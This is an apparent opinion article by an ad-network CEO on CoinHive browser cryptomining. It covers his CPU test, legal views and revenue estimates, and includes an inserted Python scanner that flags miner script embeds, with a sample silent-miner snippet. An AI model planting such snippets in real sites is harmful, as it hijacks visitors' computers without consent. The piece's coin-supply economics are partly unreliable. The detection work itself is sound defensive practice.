CoinHive: Advertising Alternative or Exploit

About two months ago I read about CoinHive and it sounded interesting. CoinHive provides software that will execute a mining program for the Monero cryptocurrency.

It allows you to use the CPU resources of your computer to mine for this cryptocurrency, just like how people have been operating Bitcoin rigs for years. The company also provides a handy “ReCAPTCHA”-style anti-hitbot script.

At the time of this writing, one Monero was worth $100.60.

The controversy is that people are not using their own computers to execute this script, and it’s not their own personal CPU resources being utilized.

You see, CoinHive provides this script to be placed on your website. If it were a script that operated on your hosting server, that may pose an issue on a shared hosting environment, causing some problems for your hosting company. But that’s also not what is going on.

The controversy is that as a piece of JavaScript, CoinHive executes on the website visitor’s computer (client-side). This directly taps into the CPU of anyone visiting that website and thereby spikes CPU usage and reduces computer performance.

Ultimately this can result in a bad website experience as well.

In early November, Ultimate Fighting Championship’s website was accused of running the cryptominer. Similarly, a small handful of top-ranking websites were using the script and have been exposed for exploitation of visitors who had not been informed.

It was only a matter of time until someone would attempt to get this past our anti-malware detections here at JuicyAds.

When we were alerted that the domain ZettaStomp.com, registered to someone in Mexico, was running the CoinHive script, I decided it was time to find out if it really does cause a poor surfing experience and if it was truly a threat.

The ZettaStomp.com landing page, comprised of just an iTunes button (and the CoinHive code), did not set off any alerts in Avast antivirus or any firewalls. In fact, there was really no indication it was running at all on our test PC, running an Intel i5-6400 Quad-Core CPU.

The CPU load immediately shot upwards and processed consistently around 80 percent of maximum load. I found no significant impact at all in using the computer, so I got more aggressive. I started surfing the Internet, played some MP3s, and then fired up multiple YouTube videos.

The test PC started to lag and CPU usage bumped up over 90 percent, but nothing terribly annoying. It did not seem to have any issue whatsoever handling the “exploitation” of its CPU by the CoinHive JavaScript.

When I ran the miner from CoinHive.com directly, it showed that with my machine mostly idle, it would process approximately 26-30 hashes per second with my CPU pegged at 90-100 percent.

When I started running more applications, the hash rate dropped; bumping up the threads only lagged the computer until it was unresponsive.

This comes in the age of ad blockers, which have disrupted decades of the advertising-supported internet. Ad-blocker users are obliviously running around the internet advertising-free and not paying for anything (but still consuming resources).

They will ultimately be responsible for the end of free internet, surely to be replaced by subscription-based monetization models. This is running free website publishers into a corner where things like CoinHive become attractive, and it represents what may very well be a solution to the problem of the “free Internet” by providing a pseudo “free pay-to-play” model.

Direct consumers could provide their CPU resources for an amount of time that equally correlates with the amount of resources or costs to use the website, and would allow the publisher to profit from each user, but it’s just not that simple.

Ironically, the response from ad-blocking companies has been to block CoinHive script, choking this source of potential cash for publishers from the growing group of freeloading leechers. Likewise, this is not something you will find on an advertising network like JuicyAds.

Even though Avast on our test PC did not flag it, our anti-malware detection alerted us immediately. JuicyAds has a history of helping to criminally prosecute illegal malware distribution, and similarly in this case, the campaign was immediately disabled and the advertiser sent packing.

As you can imagine, the anti-virus and anti-malware companies have similarly labelled CoinHive as a threat. According to TheRegister.co.uk, Malwarebytes alone has received over 130 million requests from users to block CoinHive, but even the director of Malwarebytes Labs provided a moderate statement regarding the technology:

“We do not claim that Coin Hive is malicious, or even necessarily a bad idea. The concept of allowing folks to opt-in for an alternative to advertising, which has been plagued by everything from fake news to malvertising, is a noble one. The execution of it is another story.”

Coin Hive’s response appeared equally genuine and understanding regarding the ban-hammer coming down on them, reportedly saying, “We can’t blame them.”

In fact, CoinHive has already announced the alternative “AuthedMine” which requires implicit user consent for the coin miner to operate. Their website requests the support of ad-blocking and antivirus companies to allow the software to operate uninhibited. When I tested this solution, the CPU usage increased to approximately 40 percent.
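A minimal static check of the kind an ad network could run over an advertiser's landing page, separating the silent CoinHive embed from the opt-in AuthedMine one. This is an added example, not JuicyAds' or CoinHive's code; the host authedmine.com, the `CoinHive` global name, and the sample page (script path and site key are placeholders) are assumptions made for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Assumptions: authedmine.com serves the opt-in variant; the JS global is `CoinHive`.
MINER_HOSTS = {"coinhive.com": "silent", "authedmine.com": "opt-in"}
INLINE_CALL = re.compile(r"\bCoinHive\s*\.\s*\w+\s*\(")

def classify_src(src):
    """Consent model if src loads from a listed miner domain or subdomain, else None."""
    try:  # urlsplit also resolves protocol-relative URLs such as //host/path
        host = (urlsplit(src or "").hostname or "").rstrip(".")
    except ValueError:  # malformed URL: nothing to classify
        return None
    return next((m for d, m in MINER_HOSTS.items()
                 if host == d or host.endswith("." + d)), None)

class MinerScanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings, self.inline = [], False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            self.inline = not src  # only inline script bodies are text-matched
            if classify_src(src):
                self.findings.append((classify_src(src), src))

    def handle_endtag(self, tag):
        if tag == "script":
            self.inline = False

    def handle_data(self, data):
        if self.inline and INLINE_CALL.search(data):
            self.findings.append(("inline", data.strip()[:60]))

def verdict(html):
    """Most severe finding for one page: 'silent', 'opt-in', 'inline' or 'clean'."""
    scanner = MinerScanner()
    scanner.feed(html)
    scanner.close()
    kinds = {kind for kind, _ in scanner.findings}
    return next((k for k in ("silent", "opt-in", "inline") if k in kinds), "clean")

# Constructed landing page modelled on the one described above.
SAMPLE = """<html><body><a href="#">Get it on iTunes</a>
<script src="//CoinHive.com/lib/example.js"></script>
<script>new CoinHive.Anonymous('SITE_KEY_PLACEHOLDER').start();</script></body></html>"""
```

`verdict(SAMPLE)` returns `'silent'`. A static match like this is a first-pass check on submitted pages; the sustained CPU load observed in the test above remains the behavioural signal.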

Even if we assume that it’s both ethical and moral to basically hijack someone’s CPU for profit without their knowledge or consent, is it legal? I had no idea, so I enlisted the help of Corey Silverstein from Silverstein Legal to answer that:

“Mining cryptocurrency isn’t per se illegal. Things to consider here in terms of legal issues will involve the terms of service and privacy policy on the website where the mining operations are taking place. ‘Browser wrapped’ agreements (where the terms are just at the bottom of the page) have been deemed unbinding by different courts, because the user does not know they are there or what they include. Websites should be implementing a methodology for its users to agree to their legal documents via a check-box or some other type of e-signature,” Silverstein said.

“This practice could ultimately be something the FTC may look at; the FTC is no stranger to utilizing its powers to go after those who engage in fraudulent or deceptive trade practices and this type of hijacking could fit right into the FTC’s jurisdiction. Additionally, failure to inform website visitors or get consent to use their computing resources could start a chain of individual or class action lawsuits. Regardless of when and how these types of website operators get in legal trouble, the idea of utilizing someone’s CPU resources without warning or consent is a recipe for disaster and eventually there will be consequences.”

According to an article from Pixalate, nearly 62 percent of the websites it found running CoinHive did not have a posted Terms and Conditions at all, and even more did not have a Privacy Policy (although it’s unclear whether privacy is a relevant issue here).

So all of the legality aside, is the juice worth the squeeze? Probably not.

Simply running the CoinHive miner on your computer with an average hash rate of 30 per second, for a total of 10 hours per day, would earn you approximately $0.49 per month. That isn’t even worth the amount of power the computer uses while it’s operating.

If you set up the miner on your website and say you had 1 million visitors per month to your website, with a 30-per-second hash rate, an average time on website of five minutes, with the CoinHive miner that pays out 0.00015 Monero (XMR) per million hashes, you would expect to earn (drumroll) 1.35 Monero, or approximately $135 per month.

But what if Monero was worth as much as Bitcoin, surging recently to $10,000? Then it would make sense, right? Yes and no. While it’s true this math is a whole lot more attractive at $10,000 rather than the $100 current value of Monero, cryptocurrencies work in a closed system with a finite amount of coin. This controls the value by how much of it is in circulation, and how much is available to be mined. The problem is strictly mathematics.

As the popularity of Monero grows and more and more websites mine the cryptocurrency, the number of available coins (and payments to the miners or publishers) will drop over time. Therefore, the cryptocurrency advertising solution for publishers has a limited lifespan built in, and over time will yield less and less revenue for the same amount of CPU work. That does not take into account any change in trading price of the Monero (speculators cause bubbles, and bubbles always burst). Things rarely (if ever) go up indefinitely.

After over a month of testing, my account is up to a whopping 0.00349 Monero, or $0.35.

CoinHive has suggested this technology is meant to replace advertising, but with the rampant abuse, the auto-mining solution blocked by the same ad blockers, and an opt-in model likely to produce significantly less revenue, this solution has a long way to go before it could even come close to replacing advertising revenue for publishers.

Juicy Jay is CEO and founder of JuicyAds. Readers can follow Jay on Twitter, @juicyads, visit JuicyAds.com, or like on Facebook.com/juicyads.

